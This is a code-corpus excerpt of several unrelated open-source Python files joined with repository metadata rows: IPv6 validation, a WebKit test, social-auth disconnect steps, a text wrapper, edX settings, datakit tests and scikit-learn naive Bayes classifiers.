# We can never have more than 7 ':' (1::2:3:4:5:6:7:8 is invalid)
if ip_str.count(':') > 7:
return False
# If we have no concatenation, we need to have 8 fields with 7 ':'.
if '::' not in ip_str and ip_str.count(':') != 7:
# We might have an IPv4 mapped address.
if ip_str.count('.') != 3:
return False
ip_str = _explode_shorthand_ip_string(ip_str)
# Now that we have that all squared away, let's check that each of the
# hextets are between 0x0 and 0xFFFF.
for hextet in ip_str.split(':'):
if hextet.count('.') == 3:
# If we have an IPv4 mapped address, the IPv4 portion has to
# be at the end of the IPv6 portion.
if not ip_str.split(':')[-1] == hextet:
return False
try:
validate_ipv4_address(hextet)
except ValidationError:
return False
else:
try:
# a value error here means that we got a bad hextet,
# something like 0xzzzz
if int(hextet, 16) < 0x0 or int(hextet, 16) > 0xFFFF:
return False
except ValueError:
return False
return True
def _explode_shorthand_ip_string(ip_str):
"""
Expand a shortened IPv6 address.
Args:
ip_str: A string, the IPv6 address.
Returns:
A string, the expanded IPv6 address.
"""
if not _is_shorthand_ip(ip_str):
# We've already got a longhand ip_str.
return ip_str
new_ip = []
hextet = ip_str.split('::')
# If there is a ::, we need to expand it with zeroes
# to get to 8 hextets - unless there is a dot in the last hextet,
# meaning we're doing v4-mapping
if '.' in ip_str.split(':')[-1]:
fill_to = 7
else:
fill_to = 8
if len(hextet) > 1:
sep = len(hextet[0].split(':')) + len(hextet[1].split(':'))
new_ip = hextet[0].split(':')
for __ in range(fill_to - sep):
new_ip.append('0000')
new_ip += hextet[1].split(':')
else:
new_ip = ip_str.split(':')
# Now need to make sure every hextet is 4 lower case characters.
# If a hextet is < 4 characters, we've got missing leading 0's.
ret_ip = []
for hextet in new_ip:
ret_ip.append(('0' * (4 - len(hextet)) + hextet).lower())
return ':'.join(ret_ip)
def _is_shorthand_ip(ip_str):
"""Determine if the address is shortened.
Args:
ip_str: A string, the IPv6 address.
Returns:
A boolean, True if the address is shortened.
"""
if ip_str.count('::') == 1:
return True
if any(len(x) < 4 for x in ip_str.split(':')):
return True
return False
| bsd-3-clause | 8,907,170,792,437,575,000 | 28.413284 | 75 | 0.585623 | false |
iradul/qtwebkit | Tools/Scripts/webkitpy/port/image_diff_unittest.py | 121 | 2509 | # Copyright (C) 2012 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit testing base class for Port implementations."""
import unittest2 as unittest
from webkitpy.port.server_process_mock import MockServerProcess
from webkitpy.port.image_diff import ImageDiffer
class FakePort(object):
def __init__(self, server_process_output):
self._server_process_constructor = lambda port, nm, cmd, env: MockServerProcess(lines=server_process_output)
def _path_to_image_diff(self):
return ''
def setup_environ_for_server(self, nm):
return None
class TestImageDiffer(unittest.TestCase):
def test_diff_image_failed(self):
port = FakePort(['diff: 100% failed\n'])
image_differ = ImageDiffer(port)
self.assertEqual(image_differ.diff_image('foo', 'bar', 0.1), ('', 100.0, None))
def test_diff_image_passed(self):
port = FakePort(['diff: 0% passed\n'])
image_differ = ImageDiffer(port)
self.assertEqual(image_differ.diff_image('foo', 'bar', 0.1), (None, 0, None))
| gpl-2.0 | 1,433,616,131,712,398,300 | 43.017544 | 116 | 0.740933 | false |
openhatch/oh-mainline | vendor/packages/python-social-auth/social/pipeline/disconnect.py | 88 | 1082 | from social.exceptions import NotAllowedToDisconnect
def allowed_to_disconnect(strategy, user, name, user_storage,
association_id=None, *args, **kwargs):
if not user_storage.allowed_to_disconnect(user, name, association_id):
raise NotAllowedToDisconnect()
def get_entries(strategy, user, name, user_storage, association_id=None,
*args, **kwargs):
return {
'entries': user_storage.get_social_auth_for_user(
user, name, association_id
)
}
def revoke_tokens(strategy, entries, *args, **kwargs):
revoke_tokens = strategy.setting('REVOKE_TOKENS_ON_DISCONNECT', False)
if revoke_tokens:
for entry in entries:
if 'access_token' in entry.extra_data:
backend = entry.get_backend(strategy)(strategy)
backend.revoke_token(entry.extra_data['access_token'],
entry.uid)
def disconnect(strategy, entries, user_storage, *args, **kwargs):
for entry in entries:
user_storage.disconnect(entry)
| agpl-3.0 | 5,841,264,762,316,133,000 | 33.903226 | 74 | 0.624769 | false |
simone-campagna/zapper | lib/python/zapper/text.py | 1 | 1993 | #!/usr/bin/env python3
#
# Copyright 2013 Simone Campagna
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
__author__ = 'Simone Campagna'
import re
import textwrap
class Text(object):
__re_split__ = re.compile(r'\n\n')
def __init__(self, width=70):
self.width = width
def split_paragraphs(self, text):
for paragraph in self.__re_split__.split(text):
yield paragraph
def wrap(self, text):
lines = []
for paragraph in self.split_paragraphs(text):
lines.extend(self.wrap_paragraph(paragraph))
lines.append('')
if lines:
del lines[-1]
return lines
def wrap_paragraph(self, text):
return textwrap.wrap(textwrap.dedent(text), width=self.width)
def fill(self, text):
return '\n'.join(self.wrap(text))
def fill(text):
return Text().fill(text)
if __name__ == "__main__":
text = """\
This is a very long long long line, and it should be splitted in several lines, each of them not longer than 70 characters. This will be the first paragraph.
This line belongs to the same first paragraph.
This line belongs to the second paragraph, and not to the first one. Indeed two newlines are used to separate it from the first one.
This is the second paragraph too.
This is the last paragraph. It is an useless line, as the ones above, but it is a useful example.
This is the last line of the last paragraph."""
t = Text()
print(t.fill(text))
| apache-2.0 | 557,389,295,216,239,200 | 31.145161 | 157 | 0.677371 | false |
miptliot/edx-platform | cms/envs/yaml_config.py | 12 | 8323 | """
This is the default template for our main set of AWS servers.
Before importing this settings file the following MUST be
defined in the environment:
* SERVICE_VARIANT - can be either "lms" or "cms"
* CONFIG_ROOT - the directory where the application
yaml config files are located
"""
# We intentionally define lots of variables that aren't used, and
# want to import all variables from base settings files
# pylint: disable=wildcard-import, unused-wildcard-import, undefined-variable, used-before-assignment
import yaml
from .common import *
from openedx.core.lib.logsettings import get_logger_config
from util.config_parse import convert_tokens
import os
from path import Path as path
from xmodule.modulestore.modulestore_settings import convert_module_store_setting_if_needed
# https://stackoverflow.com/questions/2890146/how-to-force-pyyaml-to-load-strings-as-unicode-objects
from yaml import Loader, SafeLoader
def construct_yaml_str(self, node):
"""
Override the default string handling function
to always return unicode objects
"""
return self.construct_scalar(node)
Loader.add_constructor(u'tag:yaml.org,2002:str', construct_yaml_str)
SafeLoader.add_constructor(u'tag:yaml.org,2002:str', construct_yaml_str)
# SERVICE_VARIANT specifies name of the variant used, which decides what YAML
# configuration files are read during startup.
SERVICE_VARIANT = os.environ.get('SERVICE_VARIANT', None)
# CONFIG_ROOT specifies the directory where the YAML configuration
# files are expected to be found. If not specified, use the project
# directory.
CONFIG_ROOT = path(os.environ.get('CONFIG_ROOT', ENV_ROOT))
# CONFIG_PREFIX specifies the prefix of the YAML configuration files,
# based on the service variant. If no variant is use, don't use a
# prefix.
CONFIG_PREFIX = SERVICE_VARIANT + "." if SERVICE_VARIANT else ""
##############################################################
#
# DEFAULT SETTINGS FOR PRODUCTION
#
# These are defaults common for all production deployments
#
DEBUG = False
TEMPLATE_DEBUG = False
EMAIL_BACKEND = 'django_ses.SESBackend'
SESSION_ENGINE = 'django.contrib.sessions.backends.cache'
DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
GIT_REPO_EXPORT_DIR = '/edx/var/edxapp/export_course_repos'
SESSION_INACTIVITY_TIMEOUT_IN_SECONDS = None
EMAIL_FILE_PATH = None
STATIC_URL_BASE = None
STATIC_ROOT_BASE = None
SESSION_COOKIE_NAME = None
ADDL_INSTALLED_APPS = []
AUTH_USE_CAS = False
CAS_ATTRIBUTE_CALLBACK = None
MICROSITE_ROOT_DIR = ''
CMS_SEGMENT_KEY = None
DATADOG = {}
ADDL_INSTALLED_APPS = []
LOCAL_LOGLEVEL = 'INFO'
##############################################################
#
# ENV TOKEN IMPORT
#
# Currently non-secure and secure settings are managed
# in two yaml files. This section imports the non-secure
# settings and modifies them in code if necessary.
#
with open(CONFIG_ROOT / CONFIG_PREFIX + "env.yaml") as env_file:
ENV_TOKENS = yaml.safe_load(env_file)
ENV_TOKENS = convert_tokens(ENV_TOKENS)
##############################################################
#
# DEFAULT SETTINGS FOR CELERY
#
# Don't use a connection pool, since connections are dropped by ELB.
BROKER_POOL_LIMIT = 0
BROKER_CONNECTION_TIMEOUT = 1
# For the Result Store, use the django cache named 'celery'
CELERY_RESULT_BACKEND = 'djcelery.backends.cache:CacheBackend'
# When the broker is behind an ELB, use a heartbeat to refresh the
# connection and to detect if it has been dropped.
BROKER_HEARTBEAT = 10.0
BROKER_HEARTBEAT_CHECKRATE = 2
# Each worker should only fetch one message at a time
CELERYD_PREFETCH_MULTIPLIER = 1
# Rename the exchange and queues for each variant
QUEUE_VARIANT = CONFIG_PREFIX.lower()
CELERY_DEFAULT_EXCHANGE = 'edx.{0}core'.format(QUEUE_VARIANT)
HIGH_PRIORITY_QUEUE = 'edx.{0}core.high'.format(QUEUE_VARIANT)
DEFAULT_PRIORITY_QUEUE = 'edx.{0}core.default'.format(QUEUE_VARIANT)
LOW_PRIORITY_QUEUE = 'edx.{0}core.low'.format(QUEUE_VARIANT)
CELERY_DEFAULT_QUEUE = DEFAULT_PRIORITY_QUEUE
CELERY_DEFAULT_ROUTING_KEY = DEFAULT_PRIORITY_QUEUE
ENV_CELERY_QUEUES = ENV_TOKENS.get('CELERY_QUEUES', None)
if ENV_CELERY_QUEUES:
CELERY_QUEUES = {queue: {} for queue in ENV_CELERY_QUEUES}
else:
CELERY_QUEUES = {
HIGH_PRIORITY_QUEUE: {},
LOW_PRIORITY_QUEUE: {},
DEFAULT_PRIORITY_QUEUE: {}
}
CELERY_ALWAYS_EAGER = False
##########################################
# Merge settings from common.py
#
# Before the tokens are imported directly
# into settings some dictionary settings
# need to be merged from common.py
ENV_FEATURES = ENV_TOKENS.get('FEATURES', {})
for feature, value in ENV_FEATURES.items():
FEATURES[feature] = value
# Delete keys from ENV_TOKENS so that when it's imported
# into settings it doesn't override what was set above
if 'FEATURES' in ENV_TOKENS:
del ENV_TOKENS['FEATURES']
vars().update(ENV_TOKENS)
##########################################
# Manipulate imported settings with code
#
# For historical reasons some settings need
# to be modified in code. For example
# conversions to other data structures that
# cannot be represented in YAML.
if STATIC_URL_BASE:
# collectstatic will fail if STATIC_URL is a unicode string
STATIC_URL = STATIC_URL_BASE.encode('ascii')
if not STATIC_URL.endswith("/"):
STATIC_URL += "/"
STATIC_URL += EDX_PLATFORM_REVISION + "/"
if STATIC_ROOT_BASE:
STATIC_ROOT = path(STATIC_ROOT_BASE) / EDX_PLATFORM_REVISION
# Cache used for location mapping -- called many times with the same key/value
# in a given request.
if 'loc_cache' not in CACHES:
CACHES['loc_cache'] = {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'edx_location_mem_cache',
}
# allow for environments to specify what cookie name our login subsystem should use
# this is to fix a bug regarding simultaneous logins between edx.org and edge.edx.org which can
# happen with some browsers (e.g. Firefox)
if SESSION_COOKIE_NAME:
# NOTE, there's a bug in Django (http://bugs.python.org/issue18012) which necessitates this being a str()
SESSION_COOKIE_NAME = str(SESSION_COOKIE_NAME)
# Additional installed apps
for app in ADDL_INSTALLED_APPS:
INSTALLED_APPS += (app,)
LOGGING = get_logger_config(LOG_DIR,
local_loglevel=LOCAL_LOGLEVEL,
logging_env=LOGGING_ENV,
debug=False,
service_variant=SERVICE_VARIANT)
if AUTH_USE_CAS:
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'django_cas.backends.CASBackend',
)
INSTALLED_APPS += ('django_cas',)
MIDDLEWARE_CLASSES += ('django_cas.middleware.CASMiddleware',)
if CAS_ATTRIBUTE_CALLBACK:
import importlib
CAS_USER_DETAILS_RESOLVER = getattr(
importlib.import_module(CAS_ATTRIBUTE_CALLBACK['module']),
CAS_ATTRIBUTE_CALLBACK['function']
)
MICROSITE_ROOT_DIR = path(MICROSITE_ROOT_DIR)
##############################################################
#
# AUTH TOKEN IMPORT
#
with open(CONFIG_ROOT / CONFIG_PREFIX + "auth.yaml") as auth_file:
AUTH_TOKENS = yaml.safe_load(auth_file)
AUTH_TOKENS = convert_tokens(AUTH_TOKENS)
vars().update(AUTH_TOKENS)
##########################################
# Manipulate imported settings with code
#
if AWS_ACCESS_KEY_ID == "":
AWS_ACCESS_KEY_ID = None
if AWS_SECRET_ACCESS_KEY == "":
AWS_SECRET_ACCESS_KEY = None
MODULESTORE = convert_module_store_setting_if_needed(MODULESTORE)
# TODO: deprecated (compatibility with previous settings)
if 'DATADOG_API' in AUTH_TOKENS:
DATADOG['api_key'] = AUTH_TOKENS['DATADOG_API']
BROKER_URL = "{0}://{1}:{2}@{3}/{4}".format(CELERY_BROKER_TRANSPORT,
CELERY_BROKER_USER,
CELERY_BROKER_PASSWORD,
CELERY_BROKER_HOSTNAME,
CELERY_BROKER_VHOST)
BROKER_USE_SSL = ENV_TOKENS.get('CELERY_BROKER_USE_SSL', False)
######################## CUSTOM COURSES for EDX CONNECTOR ######################
if FEATURES.get('CUSTOM_COURSES_EDX'):
INSTALLED_APPS += ('openedx.core.djangoapps.ccxcon',)
| agpl-3.0 | 4,286,653,009,028,260,400 | 31.135135 | 109 | 0.66971 | false |
associatedpress/datakit-data | tests/commands/test_init.py | 1 | 4495 | import os
from unittest import mock
from conftest import (
create_plugin_config,
create_project_config,
dir_contents
)
from datakit.utils import read_json
from datakit_data import Init
def test_project_buildout(caplog, fake_project, monkeypatch, tmpdir):
"""
Init should auto-generate directories and project-level config file.
"""
cmd = Init(None, None, cmd_name='data init')
parsed_args = mock.Mock()
cmd.run(parsed_args)
contents = dir_contents(tmpdir.strpath)
assert 'data' in contents
assert 'config' in contents
assert os.path.exists(os.path.join(fake_project, 'data/.gitkeep'))
assert 'Initializing project' in caplog.text
# Test default configs initialized
assert cmd.project_configs['aws_user_profile'] == 'default'
assert cmd.project_configs['s3_bucket'] == ''
assert cmd.project_configs['s3_path'] == 'fake-project'
# Test default configs initialized
project_configs = read_json(cmd.project_config_path)
assert project_configs['aws_user_profile'] == 'default'
assert project_configs['s3_bucket'] == ''
assert project_configs['s3_path'] == 'fake-project'
def test_plugin_configs_not_initialized(dkit_home):
"""
Init should NOT auto-generate plugin-level configurations.
"""
cmd = Init(None, None, cmd_name='data init')
parsed_args = mock.Mock()
cmd.run(parsed_args)
# Guard against auto-generation of plugin-level configs
assert not os.path.exists(cmd.plugin_config_path)
def test_inherit_plugin_level_configs(dkit_home, fake_project):
"""
Plugin-level default configs should override project-level defaults
"""
# Create global plugin configs, which should override project defaults
plugin_configs = {
's3_bucket': 'data.ap.org',
's3_path': '',
'aws_user_profile': 'ap'
}
create_plugin_config(dkit_home, 'datakit-data', plugin_configs)
# Iniitalize project
cmd = Init(None, None, cmd_name='data init')
parsed_args = mock.Mock()
cmd.run(parsed_args)
assert cmd.project_configs == plugin_configs
assert 'datakit-data' in dir_contents(dkit_home)
assert 'fake-project' not in dir_contents(dkit_home)
assert os.path.exists(cmd.plugin_config_path)
def test_s3_path_prefix(dkit_home, fake_project):
plugin_configs = {
's3_bucket': 'data.ap.org',
's3_path_prefix': 'projects/2017',
'aws_user_profile': 'ap'
}
create_plugin_config(dkit_home, 'datakit-data', plugin_configs)
# Iniitalize project
cmd = Init(None, None, cmd_name='data init')
parsed_args = mock.Mock()
cmd.run(parsed_args)
assert cmd.project_configs['s3_path'] == 'projects/2017/fake-project'
assert 's3_path_prefix' not in cmd.project_configs
def test_s3_path_suffix(dkit_home, fake_project):
plugin_configs = {
's3_bucket': 'data.ap.org',
's3_path_suffix': 'data',
'aws_user_profile': 'ap'
}
create_plugin_config(dkit_home, 'datakit-data', plugin_configs)
# Iniitalize project
cmd = Init(None, None, cmd_name='data init')
parsed_args = mock.Mock()
cmd.run(parsed_args)
assert cmd.project_configs['s3_path'] == 'fake-project/data'
assert 's3_path_suffix' not in cmd.project_configs
def test_s3_path_prefix_and_suffix(dkit_home, fake_project):
plugin_configs = {
's3_bucket': 'data.ap.org',
's3_path_prefix': 'projects/2017',
's3_path_suffix': 'data',
'aws_user_profile': 'ap'
}
create_plugin_config(dkit_home, 'datakit-data', plugin_configs)
# Iniitalize project
cmd = Init(None, None, cmd_name='data init')
parsed_args = mock.Mock()
cmd.run(parsed_args)
assert cmd.project_configs['s3_path'] == 'projects/2017/fake-project/data'
assert 's3_path_prefix' not in cmd.project_configs
assert 's3_path_suffix' not in cmd.project_configs
def test_preexisting_project_configs_honored(fake_project):
"""
Subsequent initializations should not overwrite a pre-existing project config.
"""
# Mimic a prior initialization by pre-creating the config file
create_project_config(fake_project, {'aws_user_profile': 'user2'})
cmd = Init(None, None, cmd_name='data init')
parsed_args = mock.Mock()
cmd.run(parsed_args)
proj_configs = cmd.project_configs
assert proj_configs['aws_user_profile'] == 'user2'
assert 's3_bucket' not in proj_configs
assert 's3_path' not in proj_configs
| isc | 392,055,649,879,973,000 | 33.576923 | 82 | 0.668966 | false |
Sklearn-HMM/scikit-learn-HMM | sklean-hmm/naive_bayes.py | 3 | 20231 | # -*- coding: utf-8 -*-
"""
The :mod:`sklearn.naive_bayes` module implements Naive Bayes algorithms. These
are supervised learning methods based on applying Bayes' theorem with strong
(naive) feature independence assumptions.
"""
# Author: Vincent Michel <[email protected]>
# Minor fixes by Fabian Pedregosa
# Amit Aides <[email protected]>
# Yehuda Finkelstein <[email protected]>
# Lars Buitinck <[email protected]>
# (parts based on earlier work by Mathieu Blondel)
#
# License: BSD 3 clause
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy.sparse import issparse
import warnings
from .base import BaseEstimator, ClassifierMixin
from .preprocessing import binarize
from .preprocessing import LabelBinarizer
from .preprocessing import label_binarize
from .utils import array2d, atleast2d_or_csr, column_or_1d, check_arrays
from .utils.extmath import safe_sparse_dot, logsumexp
from .utils.multiclass import _check_partial_fit_first_call
from .externals import six
__all__ = ['BernoulliNB', 'GaussianNB', 'MultinomialNB']
class BaseNB(six.with_metaclass(ABCMeta, BaseEstimator, ClassifierMixin)):
"""Abstract base class for naive Bayes estimators"""
@abstractmethod
def _joint_log_likelihood(self, X):
"""Compute the unnormalized posterior log probability of X
I.e. ``log P(c) + log P(x|c)`` for all rows x of X, as an array-like of
shape [n_classes, n_samples].
Input is passed to _joint_log_likelihood as-is by predict,
predict_proba and predict_log_proba.
"""
def predict(self, X):
"""
Perform classification on an array of test vectors X.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
C : array, shape = [n_samples]
Predicted target values for X
"""
jll = self._joint_log_likelihood(X)
return self.classes_[np.argmax(jll, axis=1)]
def predict_log_proba(self, X):
"""
Return log-probability estimates for the test vector X.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
C : array-like, shape = [n_samples, n_classes]
Returns the log-probability of the sample for each class
in the model, where classes are ordered arithmetically.
"""
jll = self._joint_log_likelihood(X)
# normalize by P(x) = P(f_1, ..., f_n)
log_prob_x = logsumexp(jll, axis=1)
return jll - np.atleast_2d(log_prob_x).T
def predict_proba(self, X):
"""
Return probability estimates for the test vector X.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
C : array-like, shape = [n_samples, n_classes]
Returns the probability of the sample for each class in
the model, where classes are ordered arithmetically.
"""
return np.exp(self.predict_log_proba(X))
class GaussianNB(BaseNB):
"""
Gaussian Naive Bayes (GaussianNB)
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vector, where n_samples in the number of samples and
n_features is the number of features.
y : array, shape = [n_samples]
Target vector relative to X
Attributes
----------
`class_prior_` : array, shape = [n_classes]
probability of each class.
`theta_` : array, shape = [n_classes, n_features]
mean of each feature per class
`sigma_` : array, shape = [n_classes, n_features]
variance of each feature per class
Examples
--------
>>> import numpy as np
>>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
>>> Y = np.array([1, 1, 1, 2, 2, 2])
>>> from sklearn.naive_bayes import GaussianNB
>>> clf = GaussianNB()
>>> clf.fit(X, Y)
GaussianNB()
>>> print(clf.predict([[-0.8, -1]]))
[1]
"""
def fit(self, X, y):
"""Fit Gaussian Naive Bayes according to X, y
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples
and n_features is the number of features.
y : array-like, shape = [n_samples]
Target values.
Returns
-------
self : object
Returns self.
"""
X, y = check_arrays(X, y, sparse_format='dense')
y = column_or_1d(y, warn=True)
n_samples, n_features = X.shape
self.classes_ = unique_y = np.unique(y)
n_classes = unique_y.shape[0]
self.theta_ = np.zeros((n_classes, n_features))
self.sigma_ = np.zeros((n_classes, n_features))
self.class_prior_ = np.zeros(n_classes)
epsilon = 1e-9
for i, y_i in enumerate(unique_y):
Xi = X[y == y_i, :]
self.theta_[i, :] = np.mean(Xi, axis=0)
self.sigma_[i, :] = np.var(Xi, axis=0) + epsilon
self.class_prior_[i] = np.float(Xi.shape[0]) / n_samples
return self
def _joint_log_likelihood(self, X):
X = array2d(X)
joint_log_likelihood = []
for i in range(np.size(self.classes_)):
jointi = np.log(self.class_prior_[i])
n_ij = - 0.5 * np.sum(np.log(np.pi * self.sigma_[i, :]))
n_ij -= 0.5 * np.sum(((X - self.theta_[i, :]) ** 2) /
(self.sigma_[i, :]), 1)
joint_log_likelihood.append(jointi + n_ij)
joint_log_likelihood = np.array(joint_log_likelihood).T
return joint_log_likelihood
class BaseDiscreteNB(BaseNB):
"""Abstract base class for naive Bayes on discrete/categorical data
Any estimator based on this class should provide:
__init__
_joint_log_likelihood(X) as per BaseNB
"""
def _update_class_log_prior(self, class_prior=None):
n_classes = len(self.classes_)
if class_prior is not None:
if len(class_prior) != n_classes:
raise ValueError("Number of priors must match number of"
" classes.")
self.class_log_prior_ = np.log(class_prior)
elif self.fit_prior:
# empirical prior, with sample_weight taken into account
self.class_log_prior_ = (np.log(self.class_count_)
- np.log(self.class_count_.sum()))
else:
self.class_log_prior_ = np.zeros(n_classes) - np.log(n_classes)
def partial_fit(self, X, y, classes=None, sample_weight=None):
"""Incremental fit on a batch of samples.
This method is expected to be called several times consecutively
on different chunks of a dataset so as to implement out-of-core
or online learning.
This is especially useful when the whole dataset is too big to fit in
memory at once.
This method has some performance overhead hence it is better to call
partial_fit on chunks of data that are as large as possible
(as long as fitting in the memory budget) to hide the overhead.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape = [n_samples]
Target values.
classes : array-like, shape = [n_classes]
List of all the classes that can possibly appear in the y vector.
Must be provided at the first call to partial_fit, can be omitted
in subsequent calls.
sample_weight : array-like, shape = [n_samples], optional
Weights applied to individual samples (1. for unweighted).
Returns
-------
self : object
Returns self.
"""
X = atleast2d_or_csr(X, dtype=np.float64)
_, n_features = X.shape
if _check_partial_fit_first_call(self, classes):
# This is the first call to partial_fit:
# initialize various cumulative counters
n_effective_classes = len(classes) if len(classes) > 1 else 2
self.class_count_ = np.zeros(n_effective_classes, dtype=np.float64)
self.feature_count_ = np.zeros((n_effective_classes, n_features),
dtype=np.float64)
Y = label_binarize(y, classes=self.classes_)
if Y.shape[1] == 1:
Y = np.concatenate((1 - Y, Y), axis=1)
n_samples, n_classes = Y.shape
if X.shape[0] != Y.shape[0]:
msg = "X.shape[0]=%d and y.shape[0]=%d are incompatible."
raise ValueError(msg % (X.shape[0], y.shape[0]))
# convert to float to support sample weight consistently
Y = Y.astype(np.float64)
if sample_weight is not None:
Y *= array2d(sample_weight).T
# Count raw events from data before updating the class log prior
# and feature log probas
self._count(X, Y)
# XXX: OPTIM: we could introduce a public finalization method to
# be called by the user explicitly just once after several consecutive
# calls to partial_fit and prior any call to predict[_[log_]proba]
# to avoid computing the smooth log probas at each call to partial fit
self._update_feature_log_prob()
self._update_class_log_prior()
return self
def fit(self, X, y, sample_weight=None, class_prior=None):
"""Fit Naive Bayes classifier according to X, y
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape = [n_samples]
Target values.
sample_weight : array-like, shape = [n_samples], optional
Weights applied to individual samples (1. for unweighted).
Returns
-------
self : object
Returns self.
"""
X, y = check_arrays(X, y, sparse_format='csr')
X = X.astype(np.float)
y = column_or_1d(y, warn=True)
_, n_features = X.shape
labelbin = LabelBinarizer()
Y = labelbin.fit_transform(y)
self.classes_ = labelbin.classes_
if Y.shape[1] == 1:
Y = np.concatenate((1 - Y, Y), axis=1)
# convert to float to support sample weight consistently
Y = Y.astype(np.float64)
if sample_weight is not None:
Y *= array2d(sample_weight).T
if class_prior is not None:
warnings.warn('class_prior has been made an ``__init__`` parameter'
' and will be removed from fit in version 0.15.',
DeprecationWarning)
else:
class_prior = self.class_prior
# Count raw events from data before updating the class log prior
# and feature log probas
n_effective_classes = Y.shape[1]
self.class_count_ = np.zeros(n_effective_classes, dtype=np.float64)
self.feature_count_ = np.zeros((n_effective_classes, n_features),
dtype=np.float64)
self._count(X, Y)
self._update_feature_log_prob()
self._update_class_log_prior(class_prior=class_prior)
return self
# XXX The following is a stopgap measure; we need to set the dimensions
# of class_log_prior_ and feature_log_prob_ correctly.
def _get_coef(self):
return (self.feature_log_prob_[1:]
if len(self.classes_) == 2 else self.feature_log_prob_)
def _get_intercept(self):
return (self.class_log_prior_[1:]
if len(self.classes_) == 2 else self.class_log_prior_)
coef_ = property(_get_coef)
intercept_ = property(_get_intercept)
class MultinomialNB(BaseDiscreteNB):
"""
Naive Bayes classifier for multinomial models
The multinomial Naive Bayes classifier is suitable for classification with
discrete features (e.g., word counts for text classification). The
multinomial distribution normally requires integer feature counts. However,
in practice, fractional counts such as tf-idf may also work.
Parameters
----------
alpha : float, optional (default=1.0)
Additive (Laplace/Lidstone) smoothing parameter
(0 for no smoothing).
fit_prior : boolean
Whether to learn class prior probabilities or not.
If false, a uniform prior will be used.
class_prior : array-like, size (n_classes,)
Prior probabilities of the classes. If specified the priors are not
adjusted according to the data.
Attributes
----------
`class_log_prior_` : array, shape (n_classes, )
Smoothed empirical log probability for each class.
`intercept_` : property
Mirrors ``class_log_prior_`` for interpreting MultinomialNB
as a linear model.
`feature_log_prob_`: array, shape (n_classes, n_features)
Empirical log probability of features
given a class, ``P(x_i|y)``.
`coef_` : property
Mirrors ``feature_log_prob_`` for interpreting MultinomialNB
as a linear model.
`class_count_` : array, shape (n_classes,)
Number of samples encountered for each class during fitting. This
value is weighted by the sample weight when provided.
`feature_count_` : array, shape (n_classes, n_features)
Number of samples encountered for each (class, feature)
during fitting. This value is weighted by the sample weight when
provided.
Examples
--------
>>> import numpy as np
>>> X = np.random.randint(5, size=(6, 100))
>>> y = np.array([1, 2, 3, 4, 5, 6])
>>> from sklearn.naive_bayes import MultinomialNB
>>> clf = MultinomialNB()
>>> clf.fit(X, y)
MultinomialNB(alpha=1.0, class_prior=None, fit_prior=True)
>>> print(clf.predict(X[2]))
[3]
Notes
-----
For the rationale behind the names `coef_` and `intercept_`, i.e.
naive Bayes as a linear classifier, see J. Rennie et al. (2003),
Tackling the poor assumptions of naive Bayes text classifiers, ICML.
References
----------
C.D. Manning, P. Raghavan and H. Schuetze (2008). Introduction to
Information Retrieval. Cambridge University Press, pp. 234-265.
http://nlp.stanford.edu/IR-book/html/htmledition/
naive-bayes-text-classification-1.html
"""
def __init__(self, alpha=1.0, fit_prior=True, class_prior=None):
self.alpha = alpha
self.fit_prior = fit_prior
self.class_prior = class_prior
def _count(self, X, Y):
"""Count and smooth feature occurrences."""
if np.any((X.data if issparse(X) else X) < 0):
raise ValueError("Input X must be non-negative")
self.feature_count_ += safe_sparse_dot(Y.T, X)
self.class_count_ += Y.sum(axis=0)
def _update_feature_log_prob(self):
"""Apply smoothing to raw counts and recompute log probabilities"""
smoothed_fc = self.feature_count_ + self.alpha
smoothed_cc = smoothed_fc.sum(axis=1)
self.feature_log_prob_ = (np.log(smoothed_fc)
- np.log(smoothed_cc.reshape(-1, 1)))
def _joint_log_likelihood(self, X):
